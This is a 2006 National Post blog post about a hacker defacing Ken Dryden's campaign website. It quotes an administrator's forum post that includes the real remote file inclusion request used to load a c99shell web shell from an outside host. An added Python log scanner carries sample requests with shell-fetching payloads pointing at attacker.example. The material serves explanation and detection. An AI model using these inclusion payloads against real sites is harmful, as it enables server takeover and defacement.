Angry in the Great White North
Ken Dryden's website hacked
Tuesday, September 26, 2006 at 09:48 PM

Read other posts by Steve Janke published by the National Post

Leader

Ken Dryden's website is down for the count. Still offline at the time of writing, it was felled by a hacker named TamTurk. But before the conspiracy theories start flying, TamTurk does not work for any other Liberal leadership campaign. Ken Dryden was just unlucky.



Main Story

It's been a tough day for the administrators of Ken Dryden's website:

An Internet hacker took over leadership hopeful Ken Dryden's website Tuesday.

The erstwhile hockey great's smiling visage and campaign pitch disappeared, replaced by a triumphal message: "Hacked by TamTurk. We are Turk."

That was followed by gibberish.

Lise Jolicoeur, spokeswoman for Dryden's campaign, said the hacker took over the site during the wee hours of the morning Tuesday.

Jolicoeur said no one has any idea who TamTurk is, but she's inclined to think it's just a prank - not deliberate sabotage by a rival leadership campaign.

That no one knows is strange, because TamTurk has been a busy boy.

First, check out what Ken Dryden's website looked like after the attack, but before it was taken down.

The text in the picture is some sort of Turkish proverb or saying about a "genuine push" and "helping", but I'm having trouble translating a couple of words.

The rest of the text is either TamTurk's signatures or words that mean something to the hacker community.

Why Dryden? Just dumb luck. Here is the list of attacks known to have been perpetrated by TamTurk today:


How was it done?

Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

We got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and the whole thing started again. Particularly embarrassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....

We went through all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed through:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=htt p%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F &act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"

Also, this php file did not have any defined( '_VALID_MOS' ) line...

We checked out other potentially vulnerable scripts such as the upload facilities of Docman and ZOOm,...but both upload facilities are disabled in the front-end,..and the files seem secure,...

Any opinions?

ns

So this is not an attack by another leadership campaign, but an exploitation of PHP backdoors by a hacker who gets around.
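The forum poster found the inclusion request by going through the server logs. As an added example (not code from the forum post or from the extcalendar project), here is a Python scan of access-log lines for query parameters whose value decodes to a remote URL. The log lines, client addresses, the attacker.example host and the incdir parameter are constructed; only the extcalendar path and parameter name come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Apache combined format). Addresses, the
# attacker.example host and the "incdir" parameter are placeholders; only the
# extcalendar path and parameter name come from the forum post quoted above.
SAMPLE_LOG = r'''
198.51.100.4 - - [26/Sep/2006:02:58:10 -0400] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8211
203.0.113.7 - - [26/Sep/2006:03:12:44 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fattacker.example%2Fshell.txt%3F HTTP/1.1" 200 5120
198.51.100.9 - - [26/Sep/2006:03:15:02 -0400] "GET /index.php?lang=english&dir=%2Fimages HTTP/1.1" 200 4410
203.0.113.7 - - [26/Sep/2006:03:20:31 -0400] "GET /gallery.php?incdir=ftp%253A%252F%252Fattacker.example%252Fs.txt HTTP/1.1" 404 312
'''.strip()

# Client address and request target from one combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote scheme is the include pattern.
REMOTE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_include_attempts(log_text):
    """Return one finding per query parameter whose value decodes to a remote URL."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl percent-decodes once; decode again to catch double encoding.
            decoded = unquote(value)
            if REMOTE.match(value) or REMOTE.match(decoded):
                findings.append({
                    "line": lineno,
                    "client": client,
                    "path": parts.path,
                    "param": name,
                    "value": decoded,
                })
    return findings


if __name__ == "__main__":
    for finding in find_remote_include_attempts(SAMPLE_LOG):
        print(finding)
```

A legitimate parameter that carries a URL (a redirect target, for instance) will also match, so findings need triage against the parameters the application is known to accept.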
